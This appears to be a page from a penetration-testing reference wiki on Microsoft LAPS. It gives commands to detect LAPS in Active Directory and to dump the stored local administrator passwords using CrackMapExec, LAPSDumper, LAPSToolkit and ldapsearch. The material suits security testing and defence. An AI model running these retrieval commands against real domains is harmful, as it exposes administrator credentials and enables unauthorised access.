Local Administrator Password Solution (LAPS)

Microsoft LAPS provides automated local administrator account management for every computer in Active Directory. The client-side piece of LAPS on the computer generates a random secure password and stores it in the AD attribute for the computer password. This is considered secure and mitigates an attacker passing the local administrator hash throughout the domain.

Enumerating LAPS

# Using the cmdlet Get-ADObject
Get-ADObject 'CN=mc-mcs-admpwd,CN=Schema,CN=Configuration,DC=dc,DC=parzival,DC=com' 

# Check if the DLL is installed locally
Get-ChildItem 'c:\program files\LAPS\CSE\Admpwd.dll'
dir "C:\Program Files\LAPS\CSE"

# Checking registry
reg query "HKLM\Software\Policies\Microsoft Services\AdmPwd" /v AdmPwdEnabled

Retrieving LAPS Passwords

# Retrieve password using CrackMapExec
cme ldap $dc -u $username -p $password -M laps

# https://github.com/n00py/LAPSDumper
python laps.py -u $username -p $password -d $domain

# https://github.com/leoloobeek/LAPSToolkit
Get-LAPSComputers

# Manually with LDAP
ldapsearch -x -h $host -D $user -w $password -b "dc=$domain,dc=com" "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd

References

PreviousWindows Remote Management (WinRM)NextNoPac

Last updated 2 years ago